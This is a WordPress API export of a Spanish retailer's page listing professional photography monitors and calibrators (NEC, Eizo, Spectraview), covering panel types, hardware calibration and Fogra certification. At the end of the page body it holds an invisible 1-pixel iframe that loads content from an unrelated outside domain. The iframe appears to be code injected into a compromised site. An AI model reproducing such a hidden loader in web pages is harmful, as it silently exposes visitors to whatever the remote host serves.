{"id":334,"date":"2009-02-12T23:20:30","date_gmt":"2009-02-12T21:20:30","guid":{"rendered":"http:\/\/www.microgamma.es\/blog\/?page_id=334"},"modified":"2024-11-04T21:01:15","modified_gmt":"2024-11-04T19:01:15","slug":"monitores-graficos","status":"publish","type":"page","link":"http:\/\/www.microgamma.es\/blog\/index.php\/monitores-graficos\/","title":{"rendered":"Monitores para fotograf\u00eda y calibradores"},"content":{"rendered":"<h1><span style=\"color: #808080;\"><strong><a href=\"https:\/\/www.microgamma.com\/monitores\/monitores_profesionales_fotografia.php\">MONITORES PROFESIONALES<\/a><\/strong><\/span><\/h1>\n<h2>Art\u00edculos de comparativa<\/h2>\n<p><a href=\"https:\/\/www.microgamma.com\/monitores\/ranking_monitores_graficos.php\">Ranking de monitores para fotograf\u00eda, video, dise\u00f1o y preimpressi\u00f3n<\/a><\/p>\n<p><a href=\"https:\/\/www.microgamma.shop\/2024\/08\/mejores-monitores-para-fotografia-2024\/\">Monitores para fotografia 2024<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Este es nuestro listado de monitores ordenado por calidad, que no siempre corresponde con el precio, en el no listamos la totalidad de los monitores de que disponemos, esencialmente listamos los modelos que tenemos m\u00e1s experiencia. En algunas ocasiones un mismo monitor puede venderse bajo varias denominaciones con opciones avanzadas activadas o no, como es el caso de los Spectraview.<\/p>\n<p>Hay varios aspectos a considerar en los monitores destinados a tareas gr\u00e1ficas.<br \/>\nPanel: Hasta hace poco solo se consideraban solo aptos los monitores con paneles IPS, ahora podemos utilizar tambi\u00e9n paneles SPVA, y en algunos casos muy puntuales incluso los TN hasta 22\u201d, a m\u00e1s pulgadas la limitaci\u00f3n de su angulo de visi\u00f3n influye de forma muy evidente en el color.<\/p>\n<p>Electr\u00f3nica: no solo hay que considerar, el brillo, contraste, gamma, t\u00edpico de los monitores. Para su uso en fotograf\u00eda hay que considerar otros factores como son sistema de <a href=\"http:\/\/www.microgamma.com\/tecnologia\/colorcomp.php\">control de la uniformidad<\/a>, la posibilidad de la <a href=\"http:\/\/www.microgamma.com\/microgamma_monitores\/calibracion_hardware2.php\">calibraci\u00f3n por hardware<\/a> autom\u00e1tica, el tipo de tabla LUT y su tama\u00f1o, modos predefinidos para fotograf\u00eda, etc&#8230;<\/p>\n<p>Gamut: el espacio de color que puede representar, el standard del Adobe RGB y futuro sucesor el ECI-RGB as\u00ed como el ISO Coated. Garant\u00eda: trabajamos con tres marcas, Eizo, Nec, Quato y LaCie centradas en la fabricaci\u00f3n de monitores para fotograf\u00eda, dise\u00f1o y artes gr\u00e1ficas, con experiencia, rodaje y un servicio t\u00e9cnico que responde.<\/p>\n<p>Como sistema de valoraci\u00f3n objetivo de la calidad utilizamos el software de <a href=\"http:\/\/www.microgamma.com\/UGRA\/ugra.php\">UGRA<\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.microgamma.com\/fogra\/fogra_250.png\" alt=\"monitor fogra\" width=\"250\" height=\"106\" \/><\/p>\n<p>Otro sistema objetivo para valorar la calidad de un monitor para fotograf\u00eda es la certificaci\u00f3n Fogra, esta certificaci\u00f3n solo se consigue si el monitor supera toda una serie de pruebas en base a las normas ISO vigentes. Hasta el momento solo algunos monitores de tres fabricantes han superado esta certificaci\u00f3n, b\u00e1sicamente los modelos espec\u00edficos de Nec, Eizo y Quato<\/p>\n<p>http:\/\/www.microgamma.com\/fogra\/fogra.php<\/p>\n<p>Monitores disponibles en Microgamma:<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/microgamma_monitores\/guia_monitores.php\"><strong>Monitores NEC para dise\u00f1o, fotograf\u00eda y video<\/strong><\/a><\/p>\n<p><strong><a href=\"http:\/\/www.microgamma.com\/microgamma_monitores\/gamma10_20_III.php\">Nec 2090WUXi<\/a><\/strong> &#8211; <a href=\"http:\/\/www.microgamma.com\/UGRA\/2090uxi_ugra.php\">Test UGRA<\/a><\/p>\n<p>El monitor de referencia en formato 4:3<\/p>\n<p><strong><a href=\"http:\/\/www.microgamma.com\/nec\/nec_p232w_visera_eye_one.php\">Monitor NEC P232W<\/a><\/strong><\/p>\n<p>El sucesor del 2090 y el P221W, con nuevas caracter\u00edsticas y mas conectividad DisplayPort y HDMI. Panel IPS de 10 bit y sistema de control de la uniformidad. Tiene las posibilidad de calibraci\u00f3n h\u00edbrida hardware-software mediante el Basiccolor. Su versi\u00f3n Spectraview es de clase A. Es compatible con MultiPtrofiler lo mas parecido que se ha hecho hasta hora a la calibraci\u00f3n sin utilizar colorimetro.<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/nec\/nec_p232w_visera.php\">http:\/\/www.microgamma.com\/nec\/nec_p232w_visera_spyder.php<\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.microgamma.com\/nec\/p232\/_MG_6651_250.jpg\" alt=\"nec p232\" width=\"140\" height=\"140\" \/><\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/nec\/nec_pa241w.php\">NEC PA241W<\/a><\/p>\n<p>Profesional Advance, monitores avanzados con paneles IPS de \u00faltima generaci\u00f3n. Calibraci\u00f3n mixta hardware software, mediante software Basiccolor. Es necesario utilizar conexi\u00f3n DisplayPort para sacarles el m\u00e1ximo partido.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/nec\/nec_pa272w.php\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"https:\/\/www.microgamma.com\/nec\/PA272\/nec_pa272w.jpg\" alt=\"monitor nec pa272w microgamma\" width=\"472\" height=\"224\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.microgamma.com\/nec\/nec_pa272w_visera.php\">NEC PA272W<\/a><\/p>\n<p>Uno de los primeros modelos con panel de 10 bit<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.microgamma.com\/152\/promo4.jpg\" alt=\"\" width=\"152\" height=\"142\" \/><\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/spectraview\/spectraview_242.php\">Spectraview Reference 242<\/a><\/p>\n<p>Opci\u00f3n similar al CG243W en el sentido de que es tambi\u00e9n la serie que el fabricante orienta de forma espec\u00edfica a trabajos de m\u00e1xima precisi\u00f3n en color. Se aplica lo detallado en el CG243W (Panel IPS, unidades certificadas, visera antirreflejos, electr\u00f3nica adicional) siendo el software en este caso el SpectraView Profiler, el cual necesita tambi\u00e9n un calibrador compatible tal y como he detallado en el CG243W.<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/guia_monitores_eizo.php\"><strong>Monitores EIZO, serie Flexscan y ColorEdge<\/strong><\/a><\/p>\n<p>Lea esta aviso sobre la garant\u00eda Eizo, las paginas web del canal oficial se identifican con este sello<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.microgamma.com\/eizo\/i\/logo_garantiaeizo140.jpg\" alt=\"\" width=\"140\" height=\"56\" \/><\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/garantia_eizo.php\">http:\/\/www.microgamma.com\/eizo\/garantia_eizo.php<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/eizo_coloredge_cg223w.php\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" title=\"223w\" src=\"http:\/\/www.microgamma.com\/100\/cg223w_100.jpg\" alt=\"\" width=\"100\" height=\"100\" \/><\/a><\/p>\n<p><a title=\"cg223w\" href=\"http:\/\/www.microgamma.com\/eizo\/eizo_coloredge_cg223w.php\">Monitor Eizo G223W<\/a><\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/cg222w_el_monitor_perfecto.php\">el monitor perfecto<\/a><\/p>\n<p>El Eizo CG222W es la pantalla que est\u00e1bamos esperando. Su tama\u00f1o \u201cjustamente adecuado\u201d funciona igual de bien tanto en Mac como en PC, se conectar\u00e1 f\u00e1cilmente a su portatil donde lo puedes perfilar a la perfecci\u00f3n, los colores son brillantes, limpios y neutros particularmente si est\u00e1s trabajando en blanco y negro, modo que requiere un control de color m\u00e1s ajustado que trabajando con archivos en color. El precio de 1300$ es m\u00e1s que adecuado para el rendimiento ofrecido y la confianza de saber que dispones de un color de primera categor\u00eda. Le damos a este monitor nuestra recomendaci\u00f3n m\u00e1s encarecida, y sugerimos que si est\u00e1s buscando precisi\u00f3n en el flujo de trabajo de tu estudio, o planeas substituir una veterana pantalla CRT, o a\u00f1adir una pantalla con un color preciso a tu portatil, entonces esta es tu elecci\u00f3n. Eizo es uno de los \u201cpeces gordos\u201d de la industria, y producen un producto de primer\u00edsima calidad, el cual es respaldado por un excelente servicio de soporte t\u00e9cnico y atenci\u00f3n al cliente.<\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/eizo_coloredge_247.php\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.microgamma.com\/coloredge\/cg247\/EIZO_CG247_300.jpg\" alt=\"monitor eizo cg247\" width=\"300\" height=\"234\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.microgamma.com\/eizo\/eizo_coloredge_cg243.php\">Eizo Coloredge G247W<\/a><\/p>\n<p>Se trata de un monitor perteneciente a la gama ColorEdge, que es la que el propio fabricante indica como orientada a uso en artes gr\u00e1ficas, dise\u00f1o y fotograf\u00eda. Adem\u00e1s de contar con un panel IPS de m\u00e1xima calidad incorpora una serie de elementos electr\u00f3nicos adicionales con la finalidad de proporcionar la m\u00e1xima precisi\u00f3n de color. Cada unidad incluye un certificado individual de f\u00e1brica en el que se refleja esta precisi\u00f3n, incluye adem\u00e1s visera antirreflejos y lo que ser\u00eda m\u00e1s importante el software de calibraci\u00f3n ColorNavigator, exclusivo de los monitores ColorEdge y que permite realizar calibraci\u00f3n por hardware autom\u00e1tica (se ajusta el monitor a nivel interno sin intervenci\u00f3n alguna por parte del usuario, es el tipo de calibraci\u00f3n m\u00e1s c\u00f3moda y precisa). Eso s\u00ed, para poder utilizar este software es necesario un calibrador compatible, siendo esta la raz\u00f3n de que ofrecemos varios packs de monitor + calibrador siendo los calibradores disponibles en pack el Spyder4Elite, el i1Display Pro y el Colormunki Photo. Los dos primeros ser\u00edan color\u00edmetros -\u00fanicamente calibran monitores- y el colormunki photo es un espectrofot\u00f3metro, lo cual aparte de significar una mayor precisi\u00f3n permite tambi\u00e9n la creaci\u00f3n de perfiles para impresora. As\u00ed pues, con estos packs utilizar\u00edamos cualquiera de estos calibradores \u00fanicamente como sensor, siendo el software a utilizar el propio ColorNavigator (salvo en el caso de los perfiles de impresora, que ser\u00edan con el software propio del colormunki Photo).<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.microgamma.com\/monitores\/ranking_monitores_graficos.php\"><img loading=\"lazy\" decoding=\"async\" title=\"monitores para fotografia\" src=\"http:\/\/www.microgamma.com\/monitores\/i\/rankin_2012.png\" alt=\"\" width=\"354\" height=\"980\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>MONITORES PROFESIONALES Art\u00edculos de comparativa Ranking de monitores para fotograf\u00eda, video, dise\u00f1o y preimpressi\u00f3n Monitores para fotografia 2024 &nbsp; &nbsp; &nbsp; Este es nuestro listado de monitores ordenado por calidad, que no siempre corresponde con el precio, en el no listamos la totalidad de los monitores de que disponemos, esencialmente listamos los modelos que tenemos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5506,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"om_disable_all_campaigns":false,"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"class_list":["post-334","page","type-page","status-publish","has-post-thumbnail","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/pages\/334","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=334"}],"version-history":[{"count":0,"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/pages\/334\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/media\/5506"}],"wp:attachment":[{"href":"http:\/\/www.microgamma.es\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}